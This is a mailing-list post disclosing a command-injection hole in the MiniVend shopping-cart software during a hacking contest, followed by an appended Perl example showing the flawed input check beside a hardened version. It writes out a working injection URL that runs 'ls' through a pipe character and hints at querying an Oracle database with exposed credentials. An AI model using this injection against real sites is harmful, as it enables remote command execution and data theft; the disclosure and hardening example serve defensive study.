Re: HACKED [mv] eWeek using Minivend in our openhack project
****** message to minivend-users from Alexander Lazic <all@gmx.at> ******
hi,
> Since we are paying money if anyone can crack into the store ($1,500),
> it's possible that someone is going to go through the code looking for
> ways to exploit any holes. Other than the advice in the FAQ on "Is
> MiniVend secure" and in the "MiniVend Security" section of the manual,
> are
> there any other security tips people can provide to keep our site locked
> down? Thanks very much.
there is a sec. hole in the minivend Util.pm module, routine readfile at line 810:
---cut here---
return undef if ! open(READIN, $file);
---cut here---
... minivend file view_page.html:
---cut here---
[elsif session arg =~ /^\/|\.\./]
---cut here---
does no proper input validation (they forgot about the "|" :)
these two problems allow HTTP requests like:
https://www.openhack.com/cgi-bin/eweekorcl/view_page.html?mv_arg=|ls|
so anybody can execute "any" command with minivend's permissions ..
/* with the ORACLE_USERID=minivend/hugepassword@orcl and sqlplus it should
be easy to execute queries on the oracle database
.. unfortunately the user minivend is not allowed to set
environment-variables .. due to lack of time we were not able to
have a closer look at this ... */
that's all
almei
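The two weaknesses in the message above side by side with a hardened replacement, as an added example that is not part of the original post or of MiniVend's code: the regex from view_page.html lets a pipe character through, and the two-argument open() in readfile() is what turns that character into a command; the pages/ base directory and the function names are assumptions.

```perl
#!/usr/bin/perl
# Added example (not MiniVend code): the weak check quoted above beside
# a hardened check and readfile() that a defender would use instead.
use strict;
use warnings;

# Reproduces the check in view_page.html: only a leading "/" or ".." is
# rejected, so an argument containing "|" passes straight through.
sub weak_check {
    my ($arg) = @_;
    return $arg =~ m{^/|\.\.} ? 0 : 1;   # 1 = accepted
}

# Hardened check: an allowlist of characters with no path separators at
# all, so pipe characters and traversal never reach open().
sub safe_check {
    my ($arg) = @_;
    return ($arg =~ /^[A-Za-z0-9_.-]+$/ && $arg !~ /\.\./) ? 1 : 0;
}

# Hardened readfile(): three-argument open with an explicit "<" mode,
# which never interprets "|" in the name as a pipe, plus the allowlist
# above and a fixed base directory (assumed here; MiniVend's layout is
# not shown in the message).
sub readfile_safe {
    my ($name, $base) = @_;
    $base = 'pages' unless defined $base;
    return undef unless safe_check($name);
    open(my $fh, '<', "$base/$name") or return undef;
    local $/;                 # slurp the whole file
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Constructed sample arguments: one legitimate page name and three that
# a validator must reject.
for my $arg ('index.html', '|ls|', '../etc/passwd', '/etc/passwd') {
    printf "%-16s weak=%d safe=%d\n", $arg, weak_check($arg), safe_check($arg);
}
```

Running it shows `|ls|` accepted by weak_check but rejected by safe_check; with the three-argument open, even a name that slipped through would be opened as a plain file rather than a pipe.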